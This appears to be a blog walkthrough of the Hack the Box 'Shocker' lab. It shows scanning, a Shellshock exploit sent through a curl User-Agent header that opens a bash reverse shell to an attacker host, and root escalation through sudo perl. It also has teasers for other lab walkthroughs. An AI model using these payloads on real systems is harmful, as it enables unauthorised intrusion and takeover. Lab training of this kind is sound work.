Hack the Box - Shocker - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Shocker machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Shocker machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.1.175.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

sudo nmap -T4 -p- 10.129.1.175


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

sudo nmap -T4 -p80,2222 10.129.1.175


There's an Apache webserver on port 80, so let's enumerate web directories with Gobuster:

gobuster dir -u http://10.129.1.175/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html -r -s 200,204,301,302,307,403



An easy win on Linux systems is the Shellshock vulnerability, which requires access to the web server's /cgi-bin directory. Here, the /cgi-bin/ directory came back with a 403 error, which indicates that the directory exists, but we can't access it directly. Let's see if we can find any scripts inside that directory. We'll use Gobuster again:

gobuster dir -u http://10.129.1.175/cgi-bin/ -w /usr/share/wordlists/dirb/big.txt -x php,sh -r -s 200,204,301,302,307,403



Finding a Way In

We've found a valid script file on the target's webserver, which means we can test it for the Shellshock vulnerability. We'll use cURL to send a Shellshock test request:

curl -H 'User-Agent: () { :; }; echo ; echo ; echo VULNERABLE' bash -s :'' http://10.129.1.175/cgi-bin/user.sh


Since VULNERABLE was included in the output, that's a good indication that this target is vulnerable to Shellshock. That means we can use the Shellshock exploit to get a foothold on the target by opening a reverse shell to our attacking system. But first we need to start a Netcat listener on our attacking machine.

sudo nc -nlvp 443


And now to open the reverse shell via cURL:

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.99.99/443 0>&1' http://10.129.1.175/cgi-bin/user.sh
whoami

<snipped>

Capturing the User Flag

Before moving on, we'll take this opportunity to collect the User flag. On Hack the Box Linux machines, it's usually located in a user's /home directory.

cat /home/shelly/user.txt


Privilege Escalation

We're logged in as the shelly user, who appears to be an admin on the system. Let's check what their sudo privileges are:

sudo -l


If we have sudo privilges with perl, we can use it to open a shell with root access by supplying the following command:

sudo perl -e 'exec "/bin/sh";'
whoami


Capturing the Root Flag

The last thing to do is collect the Root flag. On Hack the Box Linux systems this is usually located in the /root directory:

cat /root/root.txt


Summary

After initial scans, we found that the target's webserver had a script file accessible in the /cgi-bin directory. Suspecting that the target was vulnerable to the Shellshock exploit, We tested the system and were able to gain a foothold on the system through that exploit. Once inside, we found that the user we were logged in as had elevated privileges when using the perl program, which we utilized to gain root access and collect the objective flag.

Finish








Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more